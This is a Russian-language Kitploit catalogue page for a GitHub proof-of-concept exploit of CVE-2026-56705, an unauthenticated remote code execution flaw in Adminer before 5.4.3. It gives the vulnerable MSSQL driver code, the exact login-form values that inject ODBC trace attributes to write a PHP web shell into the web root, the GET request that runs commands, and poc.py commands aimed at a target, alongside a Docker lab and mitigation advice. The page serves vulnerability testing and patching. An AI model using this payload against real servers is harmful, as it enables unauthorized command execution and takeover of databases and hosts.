Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-56705 — Эксплойт PoC для Adminer < 5.4.3 — неаутентифицированное RCE через инъекцию PDO DSN в MSSQL, включая Docker-лабораторию и негативный тест. | Kitploit
Инструменты/GitHubGitHub/boreas37/cve-2026-56705
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingЛаборатории и Практика
GitHubboreas37/cve-2026-56705

CVE-2026-56705

Эксплойт PoC для Adminer < 5.4.3 — неаутентифицированное RCE через инъекцию PDO DSN в MSSQL, включая Docker-лабораторию и негативный тест.

Репозиторий
21 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-56705: Adminer < 5.4.3 — Неаутентифицированный RCE через инъекцию в PDO DSN для MSSQL

CVECVE-2026-56705
GHSAGHSA-r4x9-5m63-3vxw (консультация вендора) / GHSA-34q8-53jm-qc2r (база GitHub)
ПродуктAdminer (однофайловый PHP-инструмент для управления базами данных)
ЗатронутыAdminer < 5.4.3 с pdo_sqlsrv + Microsoft ODBC Driver for SQL Server
Исправлено в5.4.3
CVSS9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
ТипCWE-20 → неаутентифицированная произвольная запись файла → RCE

Краткое описание

Adminer не санирует пользовательское поле server перед формированием PDO DSN для MSSQL-подключений:

root@kitploit:~
// adminer/drivers/mssql.inc.php
function attach(string $server, string $username, string $password): string {
    list($host, $port) = host_port($server);
    return $this->dsn("sqlsrv:Server=$host" . ($port ? ",$port" : ""), $username, $password);
}

Точки с запятой в server интерпретируются как разделители атрибутов ODBC-подключения, поэтому неаутентифицированный злоумышленник может добавить произвольные атрибуты в DSN — включая TraceFile и TraceOn. Механизм трассировки unixODBC записывает полную строку подключения (с UID={username} дословно) в TraceFile до и независимо от того, успешно ли завершилось подключение. Внедрение PHP-кода через поле username и указание TraceFile в корень веб-сервера даёт веб-шелл.

Достаточно одного неаутентифицированного POST-запроса на вход. Никаких действительных учётных данных, никакого взаимодействия с пользователем.

Эксплуатация

root@kitploit:~
auth[driver]   = mssql
auth[server]   = 127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
auth[username] = <?php echo 'POC::'.shell_exec($_GET['c']);?>
auth[password] = x
  1. POST-запрос на вход формирует DSN sqlsrv:Server=127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
  2. Менеджер драйверов ODBC записывает трассировку, содержащую UID={<?php ... ?>}, в /var/www/shell.php
  3. Подключение завершается ошибкой (ожидаемо, неважно) — файл уже записан
  4. GET /shell.php?c=id → команда выполняется

Использование

root@kitploit:~
# только проверка уязвимости
python3 poc.py --target http://target/adminer.php --check

# полная эксплуатация (записывает <random>.php в корень веб-сервера)
python3 poc.py --target http://target/adminer.php --command "id"

Воспроизведение в лаборатории

root@kitploit:~
cd lab/
docker build -t adminer-cve-2026-56705 .
docker run -d -p 8081:8081 adminer-cve-2026-56705
python3 ../poc.py --target http://localhost:8081/adminer.php --command id

Лабораторный образ точно повторяет предпосылки из консультации: php:8.3-cli + pdo_sqlsrv (pecl) + msodbcsql18, корень веб-сервера доступен для записи процессу PHP.

Устранение

  • Обновитесь до Adminer 5.4.3+.
  • Если немедленное обновление невозможно: удалите/заблокируйте драйвер mssql или отсекайте ; (и пробелы) из пользовательских значений server на обратном прокси.
  • Ограничьте запись в корень веб-сервера для пользователя PHP-FPM/CLI как дополнительную меру защиты.

Авторы

В консультации вендора указано, что уязвимость обнаружена совместно репортёром и Yashar Shahinzadeh (@voorivex).

PoC и лаборатория: Hamza Cagrici (@Boreas37)

Хронология

ДатаСобытие
2026-08-25Опубликован CVE / исправлено в Adminer 5.4.3
Скачать инструмент